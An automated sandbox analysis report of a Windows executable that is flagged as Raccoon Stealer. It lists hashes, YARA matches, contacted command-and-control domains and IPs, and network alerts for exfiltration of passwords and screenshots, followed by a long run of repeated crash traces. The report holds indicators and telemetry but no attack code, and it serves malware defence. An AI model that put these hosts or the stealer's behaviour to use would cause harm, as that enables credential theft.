popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ghjk.exe

Gen1 Raccoon Stealer Generic Malware UPX Malicious Library Malicious Packer HTTP ScreenShot KeyLogger Internet API Socket Http API DNS PWS Steal credential OS Processor Check AntiDebug JPEG Format PE File DLL AntiVM PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 6, 2021, 5:58 p.m. Sept. 6, 2021, 6 p.m.
Size 968.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 be1aaef37143496d75cb83643ff63f8c
SHA256 b594ae37dfb90a402bda0803680b455ababcc67e1add26f3c3f8f192d97dbe2a
CRC32 E4377EC2
ssdeep 24576:waR0NC7TnVeuFVVo2f1sSu/3WxF0ZSFgazrw7bYOggrF0dz+QgAgL:waWNC7hLVVL1sX3WxKZKgW2hrKd7jE
Yara
  • PE_Header_Zero - PE File Signature
  • Generic_Malware_Zero - Generic Malware
  • Raccoon_Stealer_1_Zero - Raccoon Stealer
  • UPX_Zero - UPX packed file
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
telete.in
A 195.201.225.248
195.201.225.248
mazooyaar.ac.ug
A 185.215.113.77
185.215.113.77
mazoyer.ac.ug
A 185.215.113.77
185.215.113.77
IP Address Status Action
164.124.101.2 Active Moloch
185.215.113.77 Active Moloch
195.201.225.248 Active Moloch
94.158.245.173 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.77:80 -> 192.168.56.101:49210 2400024 ET DROP Spamhaus DROP Listed Traffic Inbound group 25 Misc Attack
TCP 192.168.56.101:49207 -> 195.201.225.248:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.77:80 -> 192.168.56.101:49210 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49208 2029138 ET MALWARE AZORult v3.3 Server Response M3 Malware Command and Control Activity Detected
TCP 94.158.245.173:80 -> 192.168.56.101:49214 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 94.158.245.173:80 -> 192.168.56.101:49214 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 94.158.245.173:80 -> 192.168.56.101:49214 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49210 -> 185.215.113.77:80 2027108 ET HUNTING Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 A Network Trojan was detected
TCP 192.168.56.101:49210 -> 185.215.113.77:80 2029236 ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 185.215.113.77:80 2029846 ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49207
195.201.225.248:443 		C=US, O=Let's Encrypt, CN=R3 CN=telecut.in be:a6:3d:e8:93:c3:13:0b:5f:1d:3a:f7:63:57:4c:39:0e:96:df:5e

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\vcxfse.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Access is denied.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "2364" not found.
console_handle: 0x0000000b
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x192d
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6445
exception.address: 0x40192d
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x192e
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6446
exception.address: 0x40192e
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x192f
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6447
exception.address: 0x40192f
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1930
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6448
exception.address: 0x401930
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1931
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6449
exception.address: 0x401931
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1932
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6450
exception.address: 0x401932
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1933
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6451
exception.address: 0x401933
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1934
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6452
exception.address: 0x401934
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1935
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6453
exception.address: 0x401935
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1936
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6454
exception.address: 0x401936
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1937
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6455
exception.address: 0x401937
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1938
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6456
exception.address: 0x401938
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1939
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6457
exception.address: 0x401939
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x193a
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6458
exception.address: 0x40193a
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x193b
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6459
exception.address: 0x40193b
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x193c
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6460
exception.address: 0x40193c
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x193d
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6461
exception.address: 0x40193d
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x193e
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6462
exception.address: 0x40193e
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x193f
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6463
exception.address: 0x40193f
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: ghjk+0x1940
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6464
exception.address: 0x401940
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
